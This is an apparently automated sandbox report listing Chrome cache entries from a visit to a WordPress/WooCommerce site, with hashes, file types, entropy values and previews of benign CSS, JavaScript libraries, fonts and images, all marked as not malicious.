                                                                        Preview:jQuery(function(s){s(".woocommerce-ordering").on("change","select.orderby",function(){s(this).closest("form").trigger("submit")}),s("input.qty:not(.product-quantity input.qty)").each(function(){var o=parseFloat(s(this).attr("min"));0<=o&&parseFloat(s(this).val())<o&&s(this).val(o)});var e="store_notice"+(s(".woocommerce-store-notice").data("noticeId")||"");"hidden"===Cookies.get(e)?s(".woocommerce-store-notice").hide():s(".woocommerce-store-notice").show(),s(".woocommerce-store-notice__dismiss-link").on("click",function(o){Cookies.set(e,"hidden",{path:"/"}),s(".woocommerce-store-notice").hide(),o.preventDefault()}),s(".woocommerce-input-wrapper span.description").length&&s(document.body).on("click",function(){s(".woocommerce-input-wrapper span.description:visible").prop("aria-hidden",!0).slideUp(250)}),s(".woocommerce-input-wrapper").on("click",function(o){o.stopPropagation()}),s(".woocommerce-input-wrapper :input").on("keydown",function(o){var e=s(this).parent().find("span.description

                                                                        Chrome Cache Entry: 406

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (9139)
                                                                        Category:dropped
                                                                        Size (bytes):9533
                                                                        Entropy (8bit):5.393453483611794
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:87C54EDF7DAD7DFDFDE015F6EEE45FF1
                                                                        SHA1:96EC1A06EA3093C47E1E2FC4444ADA7F4456135D
                                                                        SHA-256:EF22199864042B8CEEEE3729F3254C140DF7217364045737CA3AADF8434FB3DA
                                                                        SHA-512:5C3565BB7C80CBEBEFFD3A0A413DF03FB264EF2D2B2F7CAEAAA29B828081F6DB95EF6FE5C1D64A988D5885DEA699A7E9D112393A745A445990008A99CCD5DE9F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*!. * jQuery blockUI plugin. * Version 2.70.0-2014.11.23. * Requires jQuery v1.7 or later. *. * Examples at: http://malsup.com/jquery/block/. * Copyright (c) 2007-2013 M. Alsup. * Dual licensed under the MIT and GPL licenses:. * http://www.opensource.org/licenses/mit-license.php. * http://www.gnu.org/licenses/gpl.html. *. * Thanks to Amir-Hossein Sobhi for some excellent contributions!. */.!function(){"use strict";function e(p){p.fn._fadeIn=p.fn.fadeIn;var b=p.noop||function(){},h=/MSIE/.test(navigator.userAgent),k=/MSIE 6.0/.test(navigator.userAgent)&&!/MSIE 8.0/.test(navigator.userAgent),y=(document.documentMode,"function"==typeof document.createElement("div").style.setExpression&&document.createElement("div").style.setExpression);p.blockUI=function(e){o(window,e)},p.unblockUI=function(e){v(window,e)},p.growlUI=function(e,t,o,n){var i=p('<div class="growlUI"></div>');e&&i.append("<h1>"+e+"</h1>"),t&&i.append("<h2>"+t+"</h2>"),o===undefined&&(o=3e3);var s=function(e){p.blockUI({messa

                                                                        Chrome Cache Entry: 407

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 7680 x 4320, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):2477461
                                                                        Entropy (8bit):7.680552273115579
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5B60672DE6B0AE6171FA790B9BB1BA8C
                                                                        SHA1:5D2C22CF5CA06EA0DCA7FD7C5E1ECE0CBA975F65
                                                                        SHA-256:3C99502F3893AD75AB4040645A0C2C8D2F8183A0414776922213F149AC9D0964
                                                                        SHA-512:991973D83631DF824DE1DE820F6FC605F165B330E135DA696291792811889CDBF81961DFB618EBDBB0E862E837B8970BB2B8D93D1E0F7081AE811E2962DA8828
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR.....................pHYs..,J..,J.wztM.. .IDATx....r.L..X...U.....z.....z-.=..+.t.E........A.........?.."x...t......d.."<Me|C...G....+s0......t..y...,....._.....<y<..i,./....MSy..z[..%.o]{....=.(..3...V.\..=.....)._.W..q,.....:|,...[.|.A..u...1.{...g...,.....?u...2.....)....c..qj.G_..g..2f{^2?...._./q~.7UG...1_f.g....y}...+N...._.?.......[._3....I.'..9_....1._..u....8.o.x...Z..!..q..G9..n..Y....3...ky......3...s..s<t1_..W.....[...Z..2.....".....#..........}.U........<..{.x.g=.]v...u..5.....>..V........._.{.....^.....F....mm....W....em.k?...k.......m}.z...~z..8......X...&.?......Nk...j...[._...K[.7...4...{..k..J.o[..9.....xd.W..`...^}.......~........-k..~.......r..j........[.]......i..../fk....U.._..?~.V.].~.g..........<}...........n}.st{...,..~...w..~m{.]......7_..o}....o........k...5~..9z~:.......w......-..N............................../..................................~................................q....<.'.C....y...8N

                                                                        Chrome Cache Entry: 409

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):2894
                                                                        Entropy (8bit):5.130108035080603
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3FD2AFA98866679439097F4AB102FE0A
                                                                        SHA1:DBC9C4139E49D0D9FB41B7191AAD1A2DB6C555FD
                                                                        SHA-256:CCD31FFA708D025833F954B3E0560CEDD58DF9A0D2706B2CCEE5F501C5B2467B
                                                                        SHA-512:82811EF42ABD80CBEBD4A74D35475FC3871478FC25A486B08BB7E04921B7824DB56C56B2191E9AB56A421552B483A2E64F966396711E5F248AFAE9D1DED22CB2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.9.6
                                                                        Preview:.wpcf7 .screen-reader-response {..position: absolute;..overflow: hidden;..clip: rect(1px, 1px, 1px, 1px);..clip-path: inset(50%);..height: 1px;..width: 1px;..margin: -1px;..padding: 0;..border: 0;..word-wrap: normal !important;.}...wpcf7 form .wpcf7-response-output {..margin: 2em 0.5em 1em;..padding: 0.2em 1em;..border: 2px solid #00a0d2; /* Blue */.}...wpcf7 form.init .wpcf7-response-output,..wpcf7 form.resetting .wpcf7-response-output,..wpcf7 form.submitting .wpcf7-response-output {..display: none;.}...wpcf7 form.sent .wpcf7-response-output {..border-color: #46b450; /* Green */.}...wpcf7 form.failed .wpcf7-response-output,..wpcf7 form.aborted .wpcf7-response-output {..border-color: #dc3232; /* Red */.}...wpcf7 form.spam .wpcf7-response-output {..border-color: #f56e28; /* Orange */.}...wpcf7 form.invalid .wpcf7-response-output,..wpcf7 form.unaccepted .wpcf7-response-output,..wpcf7 form.payment-required .wpcf7-response-output {..border-color: #ffb900; /* Yellow */.}...wpcf7-form-contro

                                                                        Chrome Cache Entry: 410

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):9411
                                                                        Entropy (8bit):5.251857364756606
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:89011CB8A67973BDB2AF05D77875C56C
                                                                        SHA1:5B16C5B3034D33146532880780670618643A3A8B
                                                                        SHA-256:67F8E6963A39ABD3BF34F503B033A21021E4314C73AD1EDF8918B0EE84E7D462
                                                                        SHA-512:2D5AFA7047EA33CB21738A8D0CB0B20EA1AF026649E3B5EDD5988EE8BB3C9D5F272E0C5721081EAA0F02E9BD63D4288F54937303B968B6ABB9D943FFD4968A44
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=6.7.1
                                                                        Preview:/* Back-end css */.i.mce-i-icon {. font: 400 20px/1 dashicons;..color: #e02b20 !important;. padding: 0;. vertical-align: top;. speak: none;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;. margin-left: -2px;. padding-right: 2px.}../* Front-end css */.[id ^= bg-showmore-hidden] {..display: none;..padding-top: 15px;.}...bg-margin-for-link {..margin-bottom: initial; .}..[id ^= bg-showmore-hidden] .bg-margin-for-link {..margin-bottom: 0em; .}..a[id ^= bg-showmore-action], a[id ^= bg-showmore-action]:focus {..outline: none;.}..button.bg-green-button {..-moz-box-shadow:inset 0px 1px 0px 0px #caefab;..-webkit-box-shadow:inset 0px 1px 0px 0px #caefab;..box-shadow:inset 0px 1px 0px 0px #caefab;..background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #77d42a), color-stop(1, #5cb811));..background:-moz-linear-gradient(top, #77d42a 5%, #5cb811 100%);..background:-webkit-linear-gradient(top, #77d42a 5%, #5cb811 100%);..backgrou

                                                                        Chrome Cache Entry: 413

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3417
                                                                        Entropy (8bit):4.720593575324692
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A5B2995D05355AF729CDE2B6B0FBDFAB
                                                                        SHA1:AEE05E6ED41B531C753CA6C6C564C1FD31377B40
                                                                        SHA-256:92D4C7E119674BA3A44DDF403CE01859245EEB43309C6101DF0AB7AB7DDC8E63
                                                                        SHA-512:FA2BEC157AB48FB5DFF569F29D6C47A5A7D8772800F78110856037E1C4CE29A74C9007A3438A53900AD2BE335C42F0367F5344A395D641FC81C4DCCF9D9CA389
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:"use strict";.function woof_init_radios() {. if (icheck_skin != 'none') {. jQuery('.woof_radio_term').iCheck('destroy');.. jQuery('.woof_radio_term').iCheck({. radioClass: 'iradio_' + icheck_skin.skin + '-' + icheck_skin.color, . });.. jQuery('.woof_radio_term').off('ifChecked');. jQuery('.woof_radio_term').on('ifChecked', function (event) {. jQuery(this).attr("checked", true);. jQuery(this).parents('.woof_list').find('.woof_radio_term_reset').removeClass('woof_radio_term_reset_visible');. jQuery(this).parents('.woof_list').find('.woof_radio_term_reset').hide();. jQuery(this).parents('li').eq(0).find('.woof_radio_term_reset').eq(0).addClass('woof_radio_term_reset_visible');. var slug = jQuery(this).data('slug');. var name = jQuery(this).attr('name');. var term_id = jQuery(this).data('term-id');. woof_radio_direct_search(term_id, name, slug);.

                                                                        Chrome Cache Entry: 414

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1182), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):1182
                                                                        Entropy (8bit):4.855857319928605
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A65A757380C2BA19AC2A4D515C5F704D
                                                                        SHA1:EBA112B9928BF8DBEF9894291340FCA895FCAE22
                                                                        SHA-256:EBBCD297A73D3D6C96E90559A379D32F2B69C74032CD0952982852E969382ACA
                                                                        SHA-512:D3F52A51A5ED197EC74768062D7F029D489A32025CB9D02B02A71A0F7D5BA6B034E99A4301A3FDCC1972CA584CC97C1A6321B33E19D67319E756FA4840334524
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/uploads/elementor/css/post-403.css?ver=1709081757
                                                                        Preview:.elementor-kit-403{--e-global-color-primary:#97D1DC;--e-global-color-secondary:#54595F;--e-global-color-text:#7A7A7A;--e-global-color-accent:#61CE70;--e-global-typography-primary-font-family:"Roboto";--e-global-typography-primary-font-weight:600;--e-global-typography-secondary-font-family:"Roboto Slab";--e-global-typography-secondary-font-weight:400;--e-global-typography-text-font-family:"Roboto";--e-global-typography-text-font-weight:400;--e-global-typography-accent-font-family:"Roboto";--e-global-typography-accent-font-weight:500;}.elementor-section.elementor-section-boxed > .elementor-container{max-width:1140px;}.e-container{--container-max-width:1140px;}.elementor-widget:not(:last-child){margin-bottom:20px;}.elementor-element{--widgets-spacing:20px;}{}h1.entry-title{display:var(--page-title-display);}.elementor-kit-403 e-page-transition{background-color:#FFBC7D;}@media(max-width:1024px){.elementor-section.elementor-section-boxed > .elementor-container{max-width:1024px;}.e-container

                                                                        Chrome Cache Entry: 418

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65497)
                                                                        Category:downloaded
                                                                        Size (bytes):157372
                                                                        Entropy (8bit):4.808422684653547
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:497721199FB619484A7D9A63850A4731
                                                                        SHA1:FBB64360C43F925F5D7F40082065E2849209670E
                                                                        SHA-256:6F5705A78796992F8A9EC97DAC43AF631311FB451D8E2927210533FDE8982051
                                                                        SHA-512:6DD8CBC122374A8BFF5C9074DCDDC94578ACD737AF62FACC28440EBDA124D0C7533E0D03352469C996DA7444C230588972B22100B04EF45226BB441EA3CDDC9B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.6.1
                                                                        Preview:/*! elementor - v3.6.1 - 23-03-2022 */..dialog-widget-content{background-color:#fff;position:absolute;border-radius:3px;-webkit-box-shadow:2px 8px 23px 3px rgba(0,0,0,.2);box-shadow:2px 8px 23px 3px rgba(0,0,0,.2);overflow:hidden}.dialog-message{font-size:12px;line-height:1.5;-webkit-box-sizing:border-box;box-sizing:border-box}.dialog-type-lightbox{position:fixed;height:100%;width:100%;bottom:0;left:0;background-color:rgba(0,0,0,.8);z-index:9999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.dialog-type-lightbox .dialog-widget-content{margin:auto;width:375px}.dialog-type-lightbox .dialog-header{font-size:15px;color:#495157;padding:30px 0 10px;font-weight:500}.dialog-type-lightbox .dialog-message{padding:0 30px 30px;min-height:50px}.dialog-type-lightbox:not(.elementor-popup-modal) .dialog-header,.dialog-type-lightbox:not(.elementor-popup-modal) .dialog-message{text-align:center}.dialog-type-lightbox .dialog-buttons-wrapper{border-top:1px solid #e6e

                                                                        Chrome Cache Entry: 421

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2255)
                                                                        Category:downloaded
                                                                        Size (bytes):15731
                                                                        Entropy (8bit):5.279278552900424
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C565AE704E8D7E680F40A8DCEB8F5C38
                                                                        SHA1:59622F3D3CE70D83E61D84EFD6DC25912EC6F534
                                                                        SHA-256:04171DA73F728FA44FA31F1B188D1642CB3798DE505F5956E7B9381C4D580D3B
                                                                        SHA-512:91677AB37D46E809CF8FF59733184B088979524AE15B9F36954ED0BCF4E3AAA66B09B405BA39A17E1EB5D708582E2DE5E781BC61B538547E720B180456A62C42
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/themes/ciena/assets/vendors/swiper/swiper.css?ver=5.3.1
                                                                        Preview:/**. * Swiper 5.3.1. * Most modern mobile touch slider and framework with hardware accelerated transitions. * http://swiperjs.com. *. * Copyright 2014-2020 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: February 8, 2020. */..@font-face {. font-family: 'swiper-icons';. src: url("data:application/font-woff;charset=utf-8;base64, d09GRgABAAAAAAZgABAAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAAAGRAAAABoAAAAci6qHkUdERUYAAAWgAAAAIwAAACQAYABXR1BPUwAABhQAAAAuAAAANuAY7+xHU1VCAAAFxAAAAFAAAABm2fPczU9TLzIAAAHcAAAASgAAAGBP9V5RY21hcAAAAkQAAACIAAABYt6F0cBjdnQgAAACzAAAAAQAAAAEABEBRGdhc3AAAAWYAAAACAAAAAj//wADZ2x5ZgAAAywAAADMAAAD2MHtryVoZWFkAAABbAAAADAAAAA2E2+eoWhoZWEAAAGcAAAAHwAAACQC9gDzaG10eAAAAigAAAAZAAAArgJkABFsb2NhAAAC0AAAAFoAAABaFQAUGG1heHAAAAG8AAAAHwAAACAAcABAbmFtZQAAA/gAAAE5AAACXvFdBwlwb3N0AAAFNAAAAGIAAACE5s74hXjaY2BkYGAAYpf5Hu/j+W2+MnAzMYDAzaX6QjD6/4//Bxj5GA8AuRwMYGkAPywL13jaY2BkYGA88P8Agx4j+/8fQDYfA1AEBWgDAIB2BOoAeNpjYGRgYNBh4GdgYgABEMnIABJzYNADCQAACWgAsQB42mNg

                                                                        Chrome Cache Entry: 423

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (20372)
                                                                        Category:dropped
                                                                        Size (bytes):20415
                                                                        Entropy (8bit):5.112597669901674
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A11D02D00B6F15E20609B4F8FF56C270
                                                                        SHA1:B7519FB554E01DE96704303B1469BE3C31CD548B
                                                                        SHA-256:20EDFBBE7C60D8E3562BDCDA2DFCA7CE7C2F7F55B67FE478904B9FC74A8D6C7D
                                                                        SHA-512:0A4BCE6522A16B2A103CFD701BED9A6514BC16764410B434FEA3251BDE80F72422B3B3B0C985384B6F7E5590223A46C548524B4C6182C6629E73179AF3CF17F9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*! elementor-pro - v3.6.4 - 15-03-2022 */.(self.webpackChunkelementor_pro=self.webpackChunkelementor_pro||[]).push([[819],{7914:e=>{e.exports=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}},e.exports.__esModule=!0,e.exports.default=e.exports},2:(e,t,n)=>{"use strict";var s=n(7914);n(4242);var i=s(n(4774)),o=s(n(9575)),r=s(n(6254)),a=s(n(5161)),l=s(n(5039)),c=s(n(9210));class ElementorProFrontend extends elementorModules.ViewModule{onInit(){super.onInit(),this.config=ElementorProFrontendConfig,this.modules={}}bindEvents(){jQuery(window).on("elementor/frontend/init",this.onElementorFrontendInit.bind(this))}initModules(){let e={motionFX:i.default,sticky:o.default,codeHighlight:r.default,videoPlaylist:a.default,payments:l.default,progressTracker:c.default};elementorProFrontend.trigger("elementor-pro/modules/init:before"),e=elementorFrontend.hooks.applyFilters("elementor-pro/frontend/handlers",e),jQuery.each(e,((e,t)=>{this.modules[e]=new t})),this.modules.linkActi

                                                                        Chrome Cache Entry: 424

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 52648, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):52648
                                                                        Entropy (8bit):7.996033428788516
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:657E828FB3A5963706E24CBF9D711BB8
                                                                        SHA1:84C08557D977E0A46EC8941B2D84235069DAB229
                                                                        SHA-256:45E39853C41558C4922FF1B0895547A99E378F136EC3D9D2F4DF15CC269485FA
                                                                        SHA-512:EEBEDF24A2516B860FFA2C9241474157604F8FC2EDC9E3BF3C0A0DDDF3168519F13FC195D48D232ED8F4A5DB1C48EF0563D62B2E2BDCF55F936CBD319AB18E16
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://use.fontawesome.com/releases/v5.0.0/webfonts/fa-brands-400.woff2
                                                                        Preview:wOF2.............r....V.........................T.V..f...h..X.6.$..|..... ..*..m[.#qB.......*...v......@(B...............1......T+.....d.2OaAf.j.....b.>.........?2|/F...PR*J4[ &..b....E......../...q..4`M*D.c...-|.a.q.b..h..m..4....... ..N...?B....k.?.Ja.F7=....u|....zx..z..L.....ht......:w.-.P..!...Yh..q.=..'aP[........ .d.u......D65...,.HD.6..........8..4...(...V.........Q..../...8@.+J.B*..I.L........N...sn.n............&.5.rC0.nc,.X...".0r......D.."*F.6........b..._.....q$.c.[.y......../.0..#..$,.?..P......_...J..&...).c^.do...;~.....^...K...........7.[...BN..I.o.8.....{.....K.I#....~w._[e..... ..C@.n*.qd.....]T..Im.....';...."Y.,S$.I.N...6....m.!...;...2.m9E.\..d.=.W...{...S.#...y$T...]G...Bdp^.#.B....@a];.Q}....._.f..Y.I-....!9...].F/a.[.^..0..VMw..@..]...[.......-.~....U..)m....fc..N..-..iI.l]........u.{..k.y....+)X-.+p.V<.19.q.u8...T....n"..u....~..lIj.\..l....Pa$.$....i.....4%.....k.....e...\l9d..d...R.ij..NHRP:..>...s`.|

                                                                        Chrome Cache Entry: 425

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 13508, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):13508
                                                                        Entropy (8bit):7.9848595404020495
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DDE2379A58B73AA459E27D560B35EE4F
                                                                        SHA1:8EFF2352ACB3B2DE206C0444F4F704ED46CFB134
                                                                        SHA-256:9E7FE0EDBC32BBDA00BDEF6DC0241BC78277A37D4CEEAB5991C64D11915746B9
                                                                        SHA-512:83ED52C35A95B663E71452A250675A71E1F4EFED85D732CDC6781DD13AFAB1BFE852AAAEEA765165F615BD2D153BEC4EF167934D31C20D9632E18C87D89B1778
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://fonts.gstatic.com/s/mulish/v13/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aevGw.woff2
                                                                        Preview:wOF2......4.......z...4c..........................$..r....`?STATH..2....X./..J..6.$..l. ..........i...K...@...0"......!.m...".QV%..2v9K.|.R.O7..qj..J|...........7..H.3_..hQ....3}...(.>..nq.v[.lX.]8..Y..;..F.$'/.....M....$v.....T.2...WY..<)..?g?.$.a!ABx.&.f......PC<.............U%u......{.....0"..n.D7.3FCJ.....{..@S...x...q....A;....<..(.l.-.V.(.H..7<?..u........'f.$_....8$N.x."u?jB'...RO...si......=...f..DLN..a""......A.....$.._...t..uk.U.^).r*..&.....a"@.u{2.e&.C..7.).Mh._"..... ..M..}|Z.P..N...b.....9T...^......&.%N )..A....]R3.p3t.t!'..Rr./.P..]...tQ_S].CQ..4.,.....c....t.n_....Yp..c...$H.""".q....t,..TJ.Q...:.d:..|.,5U.2?.+..."`..K........`H.o....M..2LbN...3..`...1....!....Ab q* .Z m. z.0........#....t.../.3!.D.Z-.ny.:.!.........V...."H?*.~...Hv..q...........B..!I...[.....[ .m....z.C,E.sn.g..4O?.....L.EJ.b...u&..O...%....c2a._|8_2.X.?.c\(*..T....W..dp...(.....u.7 .v.:.9..w0P.z.\6....L......Ow.[(....K...\./.....>..m................pG..]5.

                                                                        Chrome Cache Entry: 426

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", progressive, precision 8, 1706x2560, components 3
                                                                        Category:downloaded
                                                                        Size (bytes):196368
                                                                        Entropy (8bit):7.865958617799944
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:02D8CA3C6CAF7DB4587CAF9C9B13DF41
                                                                        SHA1:2E788AB30E35E5B88E12F4F1FFEA28A440A1940A
                                                                        SHA-256:6C26536E00E19708E36196B5CE05D48A1590E6D5F206E7A9C94C1A4116DCFCF2
                                                                        SHA-512:C2DDD5B03FDB9E4685337613612B10AAAC67E2428C38F7E1B0D397CAAB1FECDB04B0D9935ADFE50EEC4401A2545A92D3968767471315AA89C06C63372FAA1B9B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/uploads/2024/09/1-bis-scaled.jpg
                                                                        Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."..............................................................................X.................................................................................................................................................................E..................................................................................R...............................................................................@..................................................................................(..............................................................................J.D................................................................................ ...................................................................@....................................................

                                                                        Chrome Cache Entry: 427

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):1823
                                                                        Entropy (8bit):4.532101813350908
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2DC80B6309B74087CCB664826A61BFB0
                                                                        SHA1:4346E25D252B40BE817FC1CB2214FB147E148E6C
                                                                        SHA-256:FC9696AC68E0C65FDB2AD0C19AECD8ADA9DB29176ADD61BC840C48328797C884
                                                                        SHA-512:F07EEF7C6D9900C1D0DAADD50E356ECD11B4BFD46CA84AAF8A9369BCD0DEF6C76ACAAE1582E47EA63B517856916B42C017E6DCE266DC7775FC808ABCFB302F8C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label.js?ver=3.3.0
                                                                        Preview:"use strict";.function woof_init_labels() {. jQuery('.woof_label_term').on('click', function () {.. var checkbox = jQuery(this).find('input.woof_label_term').eq(0);.. if (jQuery(checkbox).is(':checked')) {. jQuery(checkbox).attr("checked", false);. jQuery(this).removeClass("checked");. woof_label_process_data(checkbox, false);. } else {. jQuery(checkbox).attr("checked", true);. jQuery(this).addClass("checked");. woof_label_process_data(checkbox, true);. }. });.}.function woof_label_process_data(_this, is_checked) {. var tax = jQuery(_this).data('tax');. var name = jQuery(_this).attr('name');. var term_id = jQuery(_this).data('term-id');. woof_label_direct_search(term_id, name, tax, is_checked);.}.function woof_label_direct_search(term_id, name, tax, is_checked) {. var values = '';. var checked = true;. if (is_checked) {. if (tax in woof_current_values) {.

                                                                        Chrome Cache Entry: 428

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (5095), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):5095
                                                                        Entropy (8bit):4.700414542663715
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C5F8603C397655C844D2D45C125CD904
                                                                        SHA1:E688DA265AAE8AE56C85161E58F1DFECE51A880B
                                                                        SHA-256:832319E19532D936D6756B4EDBE9F49A5E0B0BAC7B5F402267F239BF2DB8A7AC
                                                                        SHA-512:20E9CF863EB64AEA78251119B31DB46BBD6774449755ED3DA8117F9F8C5C00036BBF0A84811FDBFB3891925B92E1B269E750899C9584420B970BA3E42830C162
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/uploads/elementor/css/post-336.css?ver=1709081758
                                                                        Preview:.elementor-336 .elementor-element.elementor-element-268fdff:not(.elementor-motion-effects-element-type-background), .elementor-336 .elementor-element.elementor-element-268fdff > .elementor-motion-effects-container > .elementor-motion-effects-layer{background-color:#F6F6F6;}.elementor-336 .elementor-element.elementor-element-268fdff{transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;}.elementor-336 .elementor-element.elementor-element-268fdff > .elementor-background-overlay{transition:background 0.3s, border-radius 0.3s, opacity 0.3s;}.elementor-336 .elementor-element.elementor-element-5642a81e{--divider-border-style:solid;--divider-color:#E3E3E3;--divider-border-width:1px;}.elementor-336 .elementor-element.elementor-element-5642a81e .elementor-divider-separator{width:100%;}.elementor-336 .elementor-element.elementor-element-5642a81e .elementor-divider{padding-top:0px;padding-bottom:0px;}.elementor-336 .elementor-element.elementor-element-6b8c29ef > .elementor-

                                                                        Chrome Cache Entry: 432

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:dropped
                                                                        Size (bytes):482
                                                                        Entropy (8bit):4.626408410219915
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:212E30E47232BE03033A87DC58EDAA95
                                                                        SHA1:4D69C4A3DC57503E08B76C774135BFE83E8B1F51
                                                                        SHA-256:1F026BEB67630ABCDBC341651B1C17591AA76261296A9FB118793765964EB4E9
                                                                        SHA-512:13F153263DBF35F91793E8F3FE7249CE87C4854620C2D97F79646C70BBB2F71C5C3759496FFD101FBC6EF9657B19595FE782200649A96473BECD1AD7DAE1F72E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#77B255" d="M36 32c0 2.209-1.791 4-4 4H4c-2.209 0-4-1.791-4-4V4c0-2.209 1.791-4 4-4h28c2.209 0 4 1.791 4 4v28z"/><path fill="#FFF" d="M29.28 6.362c-1.156-.751-2.704-.422-3.458.736L14.936 23.877l-5.029-4.65c-1.014-.938-2.596-.875-3.533.138-.937 1.014-.875 2.596.139 3.533l7.209 6.666c.48.445 1.09.665 1.696.665.673 0 1.534-.282 2.099-1.139.332-.506 12.5-19.27 12.5-19.27.751-1.159.421-2.707-.737-3.458z"/></svg>

                                                                        Chrome Cache Entry: 434

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2142), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):2142
                                                                        Entropy (8bit):4.808937135056841
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:01ECAEF76CE84F4EDA93C650894E32A0
                                                                        SHA1:A4554B59D40FB24E38F93F12BCF6C86693F6950A
                                                                        SHA-256:7302959A3FEAC84B8F4145D7D2EBE16F817336B8A965C55C394173BAF4AED68C
                                                                        SHA-512:01F208D95342EC6852E7C2F5602D3188F2C2062DDAA2EAA68D531C944FA6329C8D5C291701A2F5E62C56255EF23B546BAD65673D4A14DA47738FDDF26A8AAF53
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/frontend/price-slider.min.js?ver=6.6.1
